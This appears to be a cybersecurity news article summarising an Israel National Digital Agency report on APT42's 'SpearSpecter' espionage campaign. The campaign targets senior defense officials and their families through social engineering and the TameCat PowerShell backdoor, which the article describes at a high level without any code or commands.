The Iranian state-sponsored hacking group APT42 has expanded an espionage campaign aimed at senior defense and government officials, according to a new report from the Israel National Digital Agency (INDA).
INDA says the group, also tracked as Calanque, CharmingCypress, Educated Manticore, Mint Sandstorm, and UNC788, and linked to the IRGC intelligence apparatus, is now targeting not only high-value senior defense and government officials but also their family members in an attempt to widen the attack surface and increase psychological pressure on primary targets.
The campaign, dubbed “SpearSpecter,” relies on social engineering, with attackers spending days or even weeks building rapport through social media, public databases, and professional networks. INDA notes that the hackers often impersonate colleagues or contacts to lure victims into “exclusive” conferences or strategic meetings, sometimes extending the ruse through multiple WhatsApp conversations to build credibility.
The threat actor adapts its approach based on the value of the target and operational objectives. For credential harvesting, attackers lure victims to spoofed meeting pages that capture credentials in real time. The group also deploy a sophisticated PowerShell-based backdoor known as TameCat with modular components for data exfiltration and remote control. Once installed, TameCat establishes command-and-control channels (C&C) over Telegram and Discord, enabling long-term access, system reconnaissance, and the exfiltration of sensitive data. The backdoor selectively grabs high-value information like documents, browser data, system general information, and screenshots, which is then send back to attackers via encrypted channels.
The malware operates as a modular in-memory loader that uses trusted system binaries and temporary artifacts to blend in with normal activity and leave less traces. The tool employs various obfuscation techniques to evade detection and make analysis more difficult.
“The operators leverage a multifaceted infrastructure that combines legitimate cloud services with attacker-controlled resources, enabling seamless initial access, persistent command-and-control (C2), and covert data exfiltration,” INDA says. “Notably, Google / Mandiant documents APT42 operating multiple infrastructure clusters in parallel and abusing Google Sites to funnel victims to fake logins, alongside NICECURL and TAMECAT malware-based operations, patterns we also observe in SpearSpecter. Each cluster employs different infrastructure sets (e.g., distinct lure domains/CDNs, separate delivery hosts, varied C2 fronting) yet shares the same tooling and objectives of credential theft, data theft, and long-term espionage. In practice, this explains minor infrastructure divergences across incidents without weakening the attribution: the clusters differ in infrastructure, not in mission or tradecraft.”